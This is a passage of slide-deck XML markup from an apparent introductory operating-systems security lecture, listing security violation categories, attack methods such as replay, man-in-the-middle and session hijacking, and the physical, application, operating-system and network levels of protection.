            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="32991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System secure if resources used and accessed as intended under all  circumstances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Unachievable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Intruders (crackers) attempt to breach security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Threat is potential security violation</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Attack is attempt to breach security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Attack can be accidental or malicious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Easier to protect against accidental than malicious misuse</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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2ea5eb945af_0_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17</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;g2ea5eb945af_0_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2ea5eb945af_0_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2ea5eb945af_0_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Security Violation Categories</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;g2ea5eb945af_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="417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Breach of confidentiality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Unauthorized reading of data</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Breach of integrity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Unauthorized modification of data</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Breach of availability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Unauthorized destruction of data</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Theft of service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Unauthorized use of resources</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Denial of service (DOS)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Prevention of legitimate use</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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eca6215655_0_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18</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;g2eca6215655_0_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g2eca6215655_0_8"/>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2eca6215655_0_8"/>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Security Violation Methods</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;g2eca6215655_0_8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569450" y="776500"/>
            <a:ext cx="7591200" cy="42843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 sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Masquerading (breach authentication)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Pretending to be an authorized user to escalate privileges</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Replay attack</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>As is or with message modification</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Man-in-the-middle attack</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Intruder sits in data flow, masquerading as sender to receiver  and vice versa</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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ea5eb945af_0_1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19</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;g2ea5eb945af_0_1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2ea5eb945af_0_1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2ea5eb945af_0_1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Security Violation Methods</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;g2ea5eb945af_0_10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569450" y="825674"/>
            <a:ext cx="7591200" cy="2791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r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Session hijacking</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Intercept an already-established session to bypass authentication</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Privilege escalation</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Common attack type with access beyond what a user or  resource is supposed to have</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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l="24460" t="8716" r="11305" b="8970"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5236150" y="1425725"/>
            <a:ext cx="3350425" cy="3468275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828725" y="468800"/>
            <a:ext cx="4656900" cy="1518600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Roboto Slab"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab"/>
                <a:ea typeface="Roboto Slab"/>
                <a:cs typeface="Roboto Slab"/>
                <a:sym typeface="Roboto Slab"/>
              </a:rPr>
              <a:t>Identify and use system utilities/tools and evaluate the results</a:t>
            </a:r>
            <a:endParaRPr sz="5600" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Roboto Slab"/>
              <a:ea typeface="Roboto Slab"/>
              <a:cs typeface="Roboto Slab"/>
              <a:sym typeface="Roboto Slab"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;78;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2</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eca6215655_0_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20</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;g2eca6215655_0_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2eca6215655_0_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2eca6215655_0_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="100550"/>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Security Measure Levels</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;g2eca6215655_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585125" y="699975"/>
            <a:ext cx="7591200" cy="4096800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Impossible to have absolute security, but make cost to perpetrator sufficiently high to deter most intruders</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Security must occur at four levels to be effective:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Physical</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Data centers, servers, connected terminals</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Benign or malicious apps can cause security problems</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Operating System</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Protection mechanisms, debugging</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="15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ea5eb945af_0_2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21</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;g2ea5eb945af_0_2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g2ea5eb945af_0_2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2ea5eb945af_0_20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="100550"/>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Security Measure Levels</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;g2ea5eb945af_0_20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585125" y="585738"/>
            <a:ext cx="7591200" cy="3006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000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Intercepted communications, interruption, DOS</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Security is as weak as the weakest link in the chain</a:t>
            </a:r>
